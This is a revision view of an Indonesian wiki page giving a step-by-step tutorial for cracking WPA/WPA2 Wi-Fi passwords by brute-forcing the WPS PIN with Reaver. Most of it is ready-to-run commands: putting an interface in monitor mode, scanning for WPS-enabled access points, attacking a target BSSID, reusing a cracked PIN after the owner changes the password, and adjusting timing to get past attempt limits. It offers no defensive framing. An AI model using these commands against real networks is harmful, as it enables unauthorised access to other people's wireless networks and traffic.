Difference between revisions of "Reaver teknik menjebol WPA"

From OnnoWiki
Jump to navigation Jump to search
Line 14: Line 14:
 
Lakukan
 
Lakukan
  
 +
airmon-ng check kill
 
  airmon-ng start wlan0
 
  airmon-ng start wlan0
 
  
 
==Cek AP yang WPS-nya aktif==
 
==Cek AP yang WPS-nya aktif==

Revision as of 18:09, 12 December 2015

Sumber: http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/

WPS ada di kebanyakan router untuk proses setup yang mudah melalui pin WPS, yang di hard-coded ke Access Point wireless. Reaver mengambil keuntungan dari kerentanan di WPS. Terima kasih kepada Craig Heffner untuk merilis versi open-source dari tool ini yang bernama Reaver yang mengeksploitasi kerentanan. Dalam istilah sederhana, Reaver mencoba untuk bruteforce pin; yang akan mengungkapkan WPA atau WPA2 password setelah cukup waktu.

Kumpulkan Informasi

Lakukan

airmon-ng


Aktifkan Mode Monitor

Lakukan

airmon-ng check kill
airmon-ng start wlan0

Cek AP yang WPS-nya aktif

Lakukan

wash -i mon0

Crack

Lakukan

reaver -i monitormode -c channel -b targetbssid -vv
reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv


Tip & Trick

Sebaiknya pin WPS yang sudah di crack kita simpan, agar bisa lebih mudah meng-crack password kalau AP mengubah password-nya.

reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv
reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv


Jika setelah 10 WPS ada error, ada warning message. Ini berarti AP membatasi pin attempt. Kita perlu wait,

reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360


Default receive timeout 5 detik. Bisa di set secara manual, minimum default 1 detik.

reaver -i mon0 -b 00:01:02:03:04:05 -t 3


Default delay antara pin attempt adalah 1 detik, nilai ini dapat di naikan / diturunkan. Nilai 0 adalah tanpa delay.

reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Referensi